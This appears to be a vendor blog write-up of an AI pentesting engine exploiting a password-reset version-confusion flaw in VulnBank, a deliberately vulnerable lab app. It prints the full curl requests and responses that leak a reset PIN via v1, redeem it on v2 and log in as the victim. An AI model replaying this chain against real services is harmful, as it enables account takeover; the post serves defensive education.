Mon 15 December 2025
During a live demo of our AI pentesting engine, someone threw in one of those "yeah but can it do this?" questions:
"Could it actually find an API version confusion bug that leads to account takeover?"
We didn't have a canned story ready, so we pointed the engine at the target with the vulnerability, in this case VulnBank, a deliberately vulnerable banking app by Al-Amir Badmus, and let it go. What came back was exactly the kind of thing you hope exists only in training labs and not in production apps: a password-reset version confusion flaw that lets you take over accounts with nothing but a username.
Let's walk through what happened.
The Setup: v1 is bad, v2 is good… right?
VulnBank exposes password reset flows on two API versions:
POST /api/v1/forgot-password
POST /api/v2/forgot-password
POST /api/v1/reset-password
POST /api/v2/reset-password
The OpenAPI spec even tells you what's going on:
- v1: "full data exposure", debug_info includes the 3‑digit reset PIN.
- v2: "reduced data exposure", PIN is not exposed, debug_info not present.
So on paper:
- v1 = "legacy, leaky, don't use this in production".
- v2 = "fixed, shiny, and much safer".
Except both versions share the same backend state: the same PIN store, same users, same everything. And that's where the fun begins.
How the AI Approached It (and why that matters)
Most scanners would see "3‑digit PIN" and yell about weak entropy for 2 seconds, then move on to the next 500 endpoints.
The AI engine did something more… human:
1. Parsed the OpenAPI spec
It fetched openapi.json, looked for anything about password reset, and found /api/v{version}/forgot-password and /api/v{version}/reset-password.
2. Noticed versioned behavior differences
The spec literally documents:
- v1: debug_info includes PIN.
- v2: PIN not exposed, debug_info gone.
That's a big red flag: same feature, different security characteristics, same backend.
3. Formed a hypothesis
"If both versions share backend state and one of them leaks the PIN, can I initiate on v1 and redeem on v2?"
4. Systematically tested that hypothesis
No fuzzing storm, no "let's just hammer it until something breaks". A small number of carefully chosen requests, each with a clear goal.
The key difference lies in understanding the architecture rather than just the endpoints. This is precisely where traditional fuzzing and a reasoning-driven engine part ways.
How the Engine Actually Did It: The Proof
Let's look at the actual AI tool execution, the real commands and responses that proved this vulnerability.
Risk Intelligence Output
The engine's risk intelligence step flagged the following risk:
Password reset version-confusion across POST /api/v1/reset-password and POST /api/v2/reset-password: Exercise both versions to see if weaker validation/UX in v1 can be abused to trick users into insecure resets while v2 is stronger. Compare rate limits, token lifetimes/formats, error messaging, and whether mixed-version flows (initiate on v1, redeem on v2 or vice versa) are possible. Ensure old endpoints are retired or enforce parity and clear user messaging.
Below is how the engine systematically validated this risk.
System Prompt: Initial Reconnaissance
Fetch and parse the OpenAPI spec to enumerate password reset endpoints.
Action: Send exactly one GET request to https://vulnbank.org/static/openapi.json with a browser-like User-Agent over HTTP/1.1 keep-alive. Do not follow redirects or make any additional requests in this task. Keep rate <5 rps.
Evidence to capture: Save full raw HTTP request and response (status, headers, and body) for this single fetch.
Parsing goals (from the JSON only, no further network calls): Enumerate all paths related to password reset, including initiation and redemption/confirm. Specifically look for: /api/v1/reset-password and /api/v2/reset-password (methods, request body schema, required fields like email/captcha/MFA tokens); any confirm/redeem endpoints (e.g., /api/v1/reset-password/confirm, /api/v2/reset-password/confirm); any alternate or analogous paths. For each discovered endpoint, record: HTTP method(s), request body schema (field names, types, required flags) and example payloads if present, response codes and example/error messages, documented security requirements, and any version-specific differences between v1 and v2.
Using tool: curl
Args:
curl_args: -sS -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" --http1.1 -D - -o - -v https://vulnbank.org/static/openapi.json
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:21:20 GMT
Content-Type: application/json
Content-Length: 44061
Connection: keep-alive
Content-Disposition: inline; filename=openapi.json
Last-Modified: Mon, 13 Oct 2025 18:26:24 GMT
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=xGVbpMhRS34xZfjqdwOxLDgRUnOpqgDl7wUbKBP2gRog2Kaj0VPc9IvnPUqyGqCWx5jYshRIuONIdltkxgmILrGXGq0DukPtK3WMDg%3D%3D"}]}
CF-RAY: 99acca323ca1d3b1-FRA
alt-svc: h3=":443"; ma=86400
{
"openapi": "3.0.0",
"info": {
"title": "Vulnerable Bank API",
"description": "API documentation for the deliberately vulnerable banking application",
"version": "1.0.0",
"contact": {
"name": "Vulnerable Bank Support",
"url": "https://github.com/Commando-X/vuln-bank"
}
},
"servers": [
{
"url": "https://vulnbank.org",
"description": "Controlled Production Server"
}
],
"tags": [
{
"name": "authentication",
"description": "Authentication related endpoints"
},
{
"name": "transactions",
"description": "Transaction management endpoints"
},
{
"name": "users",
"description": "User management endpoints"
},
{
"name": "admin",
"description": "Administrative endpoints"
},
{
"name": "virtual-cards",
"description": "Virtual card management endpoints"
},
{
"name": "bill-payments",
"description": "Bill payment operations"
},
{
"name": "ai-agent",
"description": "AI Customer Support Agent (Intentionally Vulnerable)"
},
{
"name": "internal",
"description": "Internal-only endpoints for SSRF demonstration"
}
],
...
}
Parsing Results from OpenAPI JSON:
Servers/base URLs: https://vulnbank.org (description: Controlled Production Server). All enumerated endpoints are within the in-scope root host.
Password reset related endpoints (versioned with path parameter {version} ∈ {1,2}):
Initiation: /api/v{version}/forgot-password (POST)
Summary: Request password reset (versioned)
Description: Generate 3-digit reset PIN. Spec notes version differences in data exposure (v1 more sensitive, v2 less; v2 does not expose PIN in response).
Path parameters: version (in: path, required, integer, enum [1,2], default 2)
Request body (application/json, required): schema: object; properties: username: string; No explicit required[] array for the fields inside the object (only overall requestBody.required = true)
Responses: 200: Reset PIN generated; schema: object with properties: status (string), message (string), debug_info (object); Note: debug_info description: "v1: Contains extensive sensitive information including PIN. v2: Less sensitive information, PIN not exposed." 404: User not found (indicates potential user enumeration via status code/messages)
Security: No security scheme specified (public endpoint by spec)
Redemption/confirm: /api/v{version}/reset-password (POST)
Summary: Reset password using PIN (versioned)
Description: Reset password with 3-digit PIN. Version differences in data exposure (v1 includes sensitive debug info, including used PIN; v2 does not).
Path parameters: version (in: path, required, integer, enum [1,2], default 2)
Request body (application/json, required): schema: object; properties: username: string, reset_pin: string (pattern: ^\d{3}$), new_password: string; No explicit required[] array inside the object (only overall requestBody.required = true)
Responses: 200: Password reset successful; schema: object: status (string), message (string), debug_info (object); Note: debug_info description: "v1: Contains extensive debug information including used PIN. v2: Not present." 400: Invalid reset PIN
Security: No security scheme specified (public endpoint by spec)
Concrete versioned paths implied by the {version} placeholder: POST /api/v1/forgot-password, POST /api/v2/forgot-password, POST /api/v1/reset-password, POST /api/v2/reset-password
Documented version-specific differences (from spec text): v1 (older) exposes sensitive debug_info which may include the reset PIN and other details. v2 (newer) reduces data exposure; PIN is not exposed in responses and debug_info is not present on successful reset.
Critical Finding: The OpenAPI spec explicitly documents that v1 exposes debug_info.pin in responses while v2 does not, effectively announcing the security downgrade path.
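To make the enumeration step concrete, here is a minimal sketch of how a templated path with an enum-constrained path parameter can be expanded into concrete endpoints. The SPEC dictionary is a hand-trimmed stand-in built from the parsing results above; its exact nesting and the helper name expand_versioned_paths are assumptions for illustration, not the real openapi.json or the engine's code.

```python
# Hand-trimmed stand-in for the relevant part of openapi.json (assumed layout).
VERSION_PARAM = {
    "name": "version",
    "in": "path",
    "required": True,
    "schema": {"type": "integer", "enum": [1, 2], "default": 2},
}

SPEC = {
    "paths": {
        "/api/v{version}/forgot-password": {"post": {"parameters": [VERSION_PARAM]}},
        "/api/v{version}/reset-password": {"post": {"parameters": [VERSION_PARAM]}},
    }
}


def expand_versioned_paths(spec):
    """Return 'METHOD /path' strings, one per enum value of each path parameter."""
    concrete = []
    for template, operations in spec["paths"].items():
        for method, operation in operations.items():
            paths = [template]
            for param in operation.get("parameters", []):
                if param.get("in") != "path":
                    continue
                values = param.get("schema", {}).get("enum")
                if not values:
                    continue  # no enum, nothing to expand
                placeholder = "{" + param["name"] + "}"
                # Substitute every allowed value into every path built so far.
                paths = [p.replace(placeholder, str(v)) for p in paths for v in values]
            concrete.extend(f"{method.upper()} {p}" for p in paths)
    return concrete


if __name__ == "__main__":
    for endpoint in expand_versioned_paths(SPEC):
        print(endpoint)
```

Run against the stand-in, this yields the same four concrete endpoints listed above, which is the starting point for asking whether a flow can be split across versions.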
Phase 1: Wait, did you just put the PIN in the response?
First, the engine tested what the spec suggested: does v1 actually leak the PIN?
System Prompt: Test v1 Information Disclosure
Initiate v1 password reset for Account A and capture full evidence.
Action: Send exactly one POST to https://vulnbank.org/api/v1/forgot-password with headers {Content-Type: application/json} and body {"username":"testA_vconf_01"}. Keep rate <5 rps and do not retry.
Evidence to record: Raw HTTP request and response (status, all headers incl. any rate-limit/CORS/debug headers), full JSON body.
Expected outcome: Determine if v1 leaks the 3-digit reset PIN via debug_info in the response (record the PIN verbatim if present).
Using tool: curl
Args:
curl -sS -v --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
-X POST "https://vulnbank.org/api/v1/forgot-password" \
-H "Content-Type: application/json" \
--data '{"username":"testA_vconf_01"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:31:12 GMT
Content-Type: application/json
Content-Length: 228
Access-Control-Allow-Origin: *
{
"debug_info": {
"pin": "388",
"pin_length": 3,
"timestamp": "2025-11-07 12:22:57.378546",
"username": "testA_vconf_01"
},
"message": "Reset PIN has been sent to your email.",
"status": "success"
}
Critical Finding: The response directly exposes the reset PIN in debug_info.pin. With just a username, an attacker can retrieve the PIN without touching the victim's email.
The wildcard CORS policy compounds the issue: any website can trigger this request and read the response. Even without the leak, the 3-digit PIN space (000-999) is trivially bruteforceable. The response also confirms valid usernames, enabling enumeration attacks.
So:
- The 3‑digit reset PIN is right there in debug_info.pin.
- We only needed the username.
- The API is CORS‑wide open (Access-Control-Allow-Origin: *), so any malicious site can trigger this request from the victim's browser, and read the PIN back in JavaScript.
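No mailbox access, no phishing link, and no login: the spec lists no security scheme for this endpoint, so the browser-based variant needs nothing from the victim beyond a visit to a malicious page, and an attacker can just as well send the request directly. This alone is already a serious account takeover path.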
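The "trivially bruteforceable" remark about the 3-digit PIN is easy to quantify. The sketch below is a back-of-the-envelope calculation, not something the engine ran: it assumes the reset endpoint applies no lockout or rate limiting and that the PIN stays valid for the whole run, neither of which was tested here. The 5 requests per second figure is simply the ceiling the engine's prompts imposed on themselves.

```python
def brute_force_budget(pin_digits, requests_per_second):
    """Return (number of candidate PINs, worst-case seconds to try them all)."""
    pin_space = 10 ** pin_digits  # every decimal string of that length
    worst_case_seconds = pin_space / requests_per_second
    return pin_space, worst_case_seconds


if __name__ == "__main__":
    candidates, seconds = brute_force_budget(pin_digits=3, requests_per_second=5)
    print(f"{candidates} candidate PINs, at most {seconds:.0f} s at 5 rps")
```

Under those assumptions, exhausting the space takes a little over three minutes even at a deliberately polite request rate.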
Phase 2: Redeem v1 PIN for Account Takeover
System Prompt: Confirm Exploitability
Redeem v1 reset PIN for Account A to verify exploitability of the v1 PIN leakage.
Action: Send exactly one POST to https://vulnbank.org/api/v1/reset-password with body: {"username":"testA_vconf_01","reset_pin":"388","new_password":"Tmp!Pass#A1"}. Single attempt only.
Expected outcome: Confirm that the leaked v1 PIN can reset Account A's password, demonstrating practical ATO.
Using tool: curl
Args:
curl -sS -i --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v1/reset-password" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testA_vconf_01","reset_pin":"388","new_password":"Tmp!Pass#A1"}'
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:33:27 GMT
Content-Type: application/json
Content-Length: 243
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Q%2BcQ5yGSX6r8390cSNwy9wykYa2YMUpMBvBph5sOKgLcMUjnVsMc2nVsujuibpoQ16DME9mFqO%2FIkNXrjGIWpEMPxMbhGeRNrdCFZg%3D%3D"}]}
CF-RAY: 99acdbf43a805d49-FRA
alt-svc: h3=":443"; ma=86400
{
"debug_info": {
"reset_pin_used": "388",
"reset_success": true,
"timestamp": "2025-11-07 12:25:12.976952",
"username": "testA_vconf_01"
},
"message": "Password has been reset successfully",
"status": "success"
}
The password reset succeeds. v1 accepts the leaked PIN and changes the password without any email verification. The response confirms the operation with reset_success: true and even echoes back the PIN in debug_info.reset_pin_used.
At this point, we've proven that v1 alone is exploitable. Username plus leaked PIN equals account takeover. But the interesting question is whether v2 suffers from the same flaw.
Phase 3: Test Cross-Version Acceptance (The Critical Discovery)
System Prompt: Test Version Confusion
Test whether v2's redemption endpoint accepts PINs issued by v1, which would indicate shared backend state without version-boundary enforcement.
Test Sequence:
1. Initiate password reset on v1 for testB_vconf_01 (obtain leaked PIN)
2. Attempt to redeem the v1-issued PIN via v2 redemption endpoint
Hypothesis: If successful, attackers can exploit v1's leakage while using v2's interface, bypassing any client-side hardening.
Step 1: Initiate v1 reset for Account B
Using tool: curl
Args:
curl -sS -v --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v1/forgot-password" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testB_vconf_01"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:40:12 GMT
Content-Type: application/json
Content-Length: 228
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=G7Kqftl8cVngY46mK76PSPR8TjpqT%2Fdjc5KTJ%2BaaDXEBmeb%2BEBenfdKUF4LZAojIiaIYWKXhIDEFvlNoZZmSysyWGYbPIqAMpczTFg%3D%3D"}]}
CF-RAY: 99ace5d8da6ebb1b-CDG
alt-svc: h3=":443"; ma=86400
{
"debug_info": {
"pin": "223",
"pin_length": 3,
"timestamp": "2025-11-07 12:31:58.190715",
"username": "testB_vconf_01"
},
"message": "Reset PIN has been sent to your email.",
"status": "success"
}
Extracted v1 PIN: 223
Step 2: Redeem v1 PIN via v2 endpoint (cross-version attack)
Using tool: curl
Args:
curl -sS --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v2/reset-password" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testB_vconf_01","reset_pin":"223","new_password":"Tmp!Pass#B1"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:41:22 GMT
Content-Type: application/json
Content-Length: 80
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=tPZNfCsblxfbMaoEi50%2FYgP3Dyl3NXIbm%2FbExP7sBEAqmaahb0wZhEUNXtqSGlS1dimQC06PrhN%2BgHA%2BKD2x966EbFFP1Y1DMarIuw%3D%3D"}]}
CF-RAY: 99ace78c3af0924d-FRA
alt-svc: h3=":443"; ma=86400
{
"message": "Password has been reset successfully",
"status": "success"
}
v2 accepts the PIN. Despite being designed to fix v1's data leakage, v2's reset endpoint still processes PINs issued by v1. The attack chain is now complete: request a reset via v1 to leak the PIN, redeem it via v2 to bypass any client-side protections.
This is the core issue with version confusion vulnerabilities. Both API versions share the same backend PIN storage, but they enforce different security controls. Attackers can trivially mix and match: initiate on v1, where the PIN leaks, and redeem on whichever version is convenient. The versioning creates the illusion of a security boundary that doesn't exist in the implementation.
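The pattern is easier to see in a toy model. The class below is a hypothetical in-memory stand-in, not VulnBank's actual code: the class name, the single shared dictionary, and the choice to consume the PIN on use are all assumptions made for illustration. What it reproduces is the observed behavior: v1 returns the PIN, v2 does not, and redemption never asks which version issued it.

```python
import secrets


class ToyResetBackend:
    """Hypothetical reset flow in which v1 and v2 share one PIN store."""

    def __init__(self):
        self.pins = {}       # username -> PIN, shared by both versions
        self.passwords = {}  # username -> current password

    def forgot_password(self, version, username):
        pin = f"{secrets.randbelow(1000):03d}"  # 3-digit PIN, 000-999
        self.pins[username] = pin
        body = {"status": "success",
                "message": "Reset PIN has been sent to your email."}
        if version == 1:
            # The v1-only leak: the PIN is echoed back to the caller.
            body["debug_info"] = {"pin": pin, "username": username}
        return body

    def reset_password(self, version, username, reset_pin, new_password):
        # The flaw: the issuing version is never recorded or checked.
        if self.pins.get(username) != reset_pin:
            return {"status": "error", "message": "Invalid reset PIN"}
        del self.pins[username]
        self.passwords[username] = new_password
        return {"status": "success",
                "message": "Password has been reset successfully"}


if __name__ == "__main__":
    backend = ToyResetBackend()
    leaked = backend.forgot_password(1, "testB_vconf_01")["debug_info"]["pin"]
    print(backend.reset_password(2, "testB_vconf_01", leaked, "Tmp!Pass#B1"))
```

In the toy, hardening only the v2 response changes nothing for the attacker, because the state being protected is reachable from both versions.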
Phase 4: Verification - Complete Account Takeover Proof
System Prompt: Verify Account Takeover
Verify that the mixed-version redemption for Account B took effect by logging in with the new password set via v2.
Action: Send exactly one POST to https://vulnbank.org/login with headers: Content-Type: application/json; a browser-like User-Agent; Connection: keep-alive. Body JSON: {"username":"testB_vconf_01","password":"Tmp!Pass#B1"}. Keep <5 rps; single attempt only.
Evidence to capture verbatim: Full raw HTTP request and full raw HTTP response (status, all headers including any Set-Cookie and Access-Control-Allow-*, and full JSON body).
Expected outcome: Confirmed login (200 success with valid token) demonstrates the v2 accept of a v1 PIN resulted in an actual password change. On success, extract the token, identify if JWT, and decode header/payload locally to confirm claims match Account B.
Using tool: curl
Args:
curl -sS --http1.1 -i -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive" \
-X POST "https://vulnbank.org/login" \
--data '{"username":"testB_vconf_01","password":"Tmp!Pass#B1"}'
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:43:06 GMT
Content-Type: application/json
Content-Length: 501
Connection: keep-alive
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=VbrIMCsVFv4mkFtw%2FZPjNJMVtH8dELhrPGiY3jiVR6fT7G63HAaGXj%2B3P5z8zGS9gNRqqnzvka7L5cQ%2FSATUkkY87SWWVqM0KJntZA%3D%3D"}]}
Set-Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0NiwidXNlcm5hbWUiOiJ0ZXN0Ql92Y29uZl8wMSIsImlzX2FkbWluIjpmYWxzZSwiaWF0IjoxNzYyNTE4ODkyfQ.La_TBdG8Sv2tPiNK4XgmLZR1ek7wwvoztvs9slBMzw0; HttpOnly; Path=/
CF-RAY: 99acea17dacb6f99-CDG
alt-svc: h3=":443"; ma=86400
{
"accountNumber": "6235161082",
"debug_info": {
"account_number": "6235161082",
"is_admin": false,
"login_time": "2025-11-07 12:34:52.147690",
"user_id": 46,
"username": "testB_vconf_01"
},
"isAdmin": false,
"message": "Login successful",
"status": "success",
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0NiwidXNlcm5hbWUiOiJ0ZXN0Ql92Y29uZl8wMSIsImlzX2FkbWluIjpmYWxzZSwiaWF0IjoxNzYyNTE4ODkyfQ.La_TBdG8Sv2tPiNK4XgmLZR1ek7wwvoztvs9slBMzw0"
}
Token Analysis: Token format is JWT (three base64url segments). Decoded header: {"typ":"JWT","alg":"HS256"}. Decoded payload: {"user_id":46,"username":"testB_vconf_01","is_admin":false,"iat":1762518892}. Claims match: Account B (user_id 46, username testB_vconf_01).
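The token analysis can be reproduced locally with nothing but the standard library. This is a minimal sketch of decoding a JWT's header and payload without verifying the signature; the helper name decode_jwt_unverified is ours, and the token is the lab account's token copied from the response above. It only inspects claims and says nothing about whether the signature is valid.

```python
import base64
import json

# Token for the lab account testB_vconf_01, copied from the login response above.
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VyX2lkIjo0NiwidXNlcm5hbWUiOiJ0ZXN0Ql92Y29uZl8wMSIsImlzX2FkbWluIjpmYWxzZSwiaWF0IjoxNzYyNTE4ODkyfQ."
    "La_TBdG8Sv2tPiNK4XgmLZR1ek7wwvoztvs9slBMzw0"
)


def decode_jwt_unverified(token):
    """Return (header, payload) as dicts. The signature is NOT checked."""
    header_b64, payload_b64, _signature = token.split(".")

    def decode_segment(segment):
        # JWT segments are base64url without padding; restore it before decoding.
        padded = segment + "=" * (-len(segment) % 4)
        return json.loads(base64.urlsafe_b64decode(padded))

    return decode_segment(header_b64), decode_segment(payload_b64)


if __name__ == "__main__":
    header, payload = decode_jwt_unverified(TOKEN)
    print(header)
    print(payload)
```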
The login succeeds. The password was successfully changed via the cross-version attack, and the JWT confirms we now control the account.
The complete attack requires only a username. No email access, no user interaction, no brute force. Request reset on v1, extract PIN from response, redeem on v2, authenticate. Three HTTP requests, under 30 minutes of testing.
Net cost of the attack:
- Inputs required: username only.
- User interaction: none.
- Requests:
  - v1 forgot‑password → leak PIN
  - v2 reset‑password → set password
  - login → verify takeover
- Time: found in under 30 minutes of targeted probing.
Why This Happens: Trust Boundaries by Naming Convention
The root issue isn't just "you leaked a PIN" (though that's bad). It's the mental model teams have around API versioning:
- v1: "old stuff, might be a bit dodgy".
- v2: "fixed and safe".
But in reality:
- Both versions talk to the same PIN store.
- Both versions handle the same user accounts.
- Only one version got the security fix.
So you've created what looks like a security boundary ("use v2, it's safer") without actually changing the trust boundary under the hood.
This is the broader pattern:
- Multiple versions of a security‑sensitive flow (password reset, MFA, tokens, sessions).
- One version gets hardened; the old one lingers, sometimes "for compatibility".
- Both share backend state.
- Attackers mix and match: use the weak pieces of v1, the convenient pieces of v2.
The OpenAPI spec here even advertises the downgrade path:
- "v1: debug_info includes PIN"
- "v2: no PIN exposure"
If you publish this and don't strictly separate behavior on the backend, you're essentially shipping your own attack playbook.
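One way to "strictly separate behavior on the backend" is to record which version issued a PIN and refuse to redeem it anywhere else. The store below is a hypothetical sketch under that assumption; the class and method names are ours, and nothing here reflects how VulnBank is or should be implemented. It closes only the mix-and-match path: a v1 endpoint that still returns the PIN remains exploitable on v1 itself, so retiring v1 or removing the debug output is still required.

```python
import secrets


class VersionBoundResetStore:
    """Hypothetical PIN store that ties each PIN to the API version that issued it."""

    def __init__(self):
        self._pending = {}  # username -> (issuing_version, pin)

    def issue(self, version, username):
        pin = f"{secrets.randbelow(1000):03d}"
        self._pending[username] = (version, pin)
        return pin  # delivered out of band (e.g. email), never in the API response

    def redeem(self, version, username, pin):
        record = self._pending.get(username)
        if record is None:
            return False
        issued_version, issued_pin = record
        if issued_version != version:
            return False  # PIN was issued by a different API version
        if not secrets.compare_digest(issued_pin, pin):
            return False
        del self._pending[username]  # single use
        return True


if __name__ == "__main__":
    store = VersionBoundResetStore()
    pin = store.issue(1, "testB_vconf_01")
    print("redeem on v2:", store.redeem(2, "testB_vconf_01", pin))
    print("redeem on v1:", store.redeem(1, "testB_vconf_01", pin))
```

A 3-digit PIN is still far too small in either design; the sketch keeps it only to mirror the flow described in this post.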
Why Fuzzing Alone Often Misses This
Traditional scanners tend to:
- Blast endpoints with payloads.
- Flag low‑hanging issues (weak entropy, missing auth, etc.).
- Treat each endpoint largely in isolation.
This bug wasn't about:
- A weird edge‑case parser issue,
- A bizarre HTTP smuggling gadget,
- Or something only reproducible with 6 proxies and a goat sacrifice.
It was about relationships:
- Same user.
- Same PIN.
- Two versions of the same flow with different guarantees.
The AI engine found it by:
- Reading the OpenAPI spec like a human would.
- Spotting that v1 and v2 behave differently around security.
- Asking, "Do they share state?" and then proving they do.
If your testing strategy doesn't reason about flows across versions, these bugs will sit there happily in plain sight.
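Reasoning about flows across versions can be turned into a small, repeatable check: for every ordered pair of versions, initiate on one and try to redeem on the other. The harness below is a sketch of that idea; the function name and the initiate/redeem callables are hypothetical hooks you would wire to your own test client, and the stubs merely imitate the behavior observed in this post.

```python
from itertools import product


def mixed_version_findings(versions, initiate, redeem):
    """Return (issued_on, redeemed_on) pairs where a cross-version redeem works.

    initiate(version) -> secret obtained by the tester, or None if none leaked.
    redeem(version, secret) -> True if that version accepted the secret.
    """
    findings = []
    for issued_on, redeemed_on in product(versions, repeat=2):
        if issued_on == redeemed_on:
            continue  # same-version flows are covered by ordinary tests
        secret = initiate(issued_on)
        if secret is not None and redeem(redeemed_on, secret):
            findings.append((issued_on, redeemed_on))
    return findings


# Stubs imitating the observed behavior: only v1 leaks, any version redeems.
def stub_initiate(version):
    return "388" if version == 1 else None


def stub_redeem(version, secret):
    return secret == "388"


if __name__ == "__main__":
    print(mixed_version_findings([1, 2], stub_initiate, stub_redeem))
```

The useful property is that the matrix grows with the number of versions rather than with the size of a wordlist, so it stays cheap to run on every release.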
The Meta‑Lesson: Targeted Reasoning Beats Blind Thrashing
This whole bug fell out of a simple thought process:
- The spec says there are 2 versions.
- The spec says they behave differently around security.
- The reset PINs seem to live in shared backend state.
- Try mixing them.
No giant wordlists. No hours of fuzzing. Just understanding and a handful of well‑chosen HTTP requests.
If you're building or testing APIs at any scale, you want that kind of thinking, human or machine, on your side.